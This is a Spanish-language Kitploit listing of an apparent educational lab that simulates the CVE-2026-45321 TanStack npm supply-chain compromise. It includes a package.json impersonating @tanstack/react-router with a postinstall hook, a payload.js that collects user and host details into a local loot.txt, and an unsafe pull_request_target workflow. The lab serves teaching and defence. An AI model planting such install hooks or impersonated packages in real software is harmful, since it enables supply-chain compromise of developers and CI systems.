Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-45321-Tanstack | Kitploit
Herramientas/GitHubGitHub/renewablehacking/cve-2026-45321-tanstack
Análisis de VulnerabilidadesAnálisis de MalwareSeguridad de Cadena de SuministroAprendizaje y EducaciónLabs y Práctica
GitHubrenewablehacking/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 2 mesesAún no revisado

Simulación de Ataque a la Cadena de Suministro — CVE-2026-45321 (TanStack)

Laboratorio educativo para comprender los ataques a la cadena de suministro de npm, el abuso de CI/CD y la ejecución de código en el momento de la instalación.

Descargo de responsabilidad

Este proyecto se crea únicamente para:

  • aprendizaje en ciberseguridad,
  • investigación en seguridad defensiva,
  • simulación de laboratorio local,
  • comprender el concepto de ataque a la cadena de suministro.

No utilices este proyecto para:

  • atacar sistemas reales,
  • robar credenciales,
  • desplegar malware,
  • accesos no autorizados,
  • o cualquier otra actividad ilegal.

Descripción

Este laboratorio simula el concepto básico de los incidentes:

  • CVE-2026-45321
  • Compromiso de la cadena de suministro de TanStack npm
  • Abuso de CI/CD de GitHub Actions
  • Ejecución de scripts del ciclo de vida de npm

La simulación se realiza de forma local y segura, sin:

  • robo real de credenciales,
  • exfiltración de tokens,
  • ni compromiso de servicios de terceros.

Estructura del Laboratorio

root@kitploit:~
lab/
├── fake-repo/          # Simulasi repository target
├── attacker-package/   # Simulasi package malicious
└── victim-project/     # Simulasi korban

Cómo Funciona la Simulación

root@kitploit:~
Attacker Package
        ↓
npm install
        ↓
postinstall script berjalan
        ↓
payload.js dieksekusi otomatis
        ↓
Korban terkena install-time execution

Conceptos que se Aprenden

  • hooks del ciclo de vida de npm
  • ejecución arbitraria de código en el momento de la instalación
  • ataque a la cadena de suministro
  • límite de confianza de CI/CD
  • paquete npm malicioso
  • abuso de postinstall
  • compromiso de dependencias

Instalación

1. Clonar el Repositorio

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

Configuración del Paquete del Atacante

2. Entrar en la Carpeta del Paquete del Atacante

root@kitploit:~
cd attacker-package

3. Instalar Dependencias

root@kitploit:~
npm install

4. Crear el Paquete Tarball

root@kitploit:~
npm pack

Resultado:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

Simulación de la Víctima

5. Entrar en el Proyecto de la Víctima

root@kitploit:~
cd ../victim-project

6. Instalar el Paquete Malicioso

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

Salida

Si se ejecuta correctamente, aparecerá:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

y el archivo:

root@kitploit:~
loot.txt

se creará automáticamente.


Ejemplo de payload.js

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

Ejemplo de package.json

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

Simulación de CI/CD

Este proyecto también se puede utilizar para comprender:

  • GitHub Actions
  • pull_request_target
  • límite de privilegios de CI/CD
  • ejecución de dependencias

Ejemplo de workflow:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

Relación con CVE-2026-45321

Simulación de LaboratorioMundo Real
attacker-packagepaquete TanStack comprometido
payload.jsinstalador malicioso

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

Solo con Fines Educativos

Este laboratorio se creó para aumentar la concienciación sobre:

  • seguridad de la cadena de suministro,
  • seguridad de dependencias,
  • seguridad de CI/CD,
  • e investigación en seguridad defensiva.
Descargar herramienta
postinstallabuso de hook del ciclo de vida
victim-projectdesarrollador/CI víctima
fake-repopipeline de GitHub Actions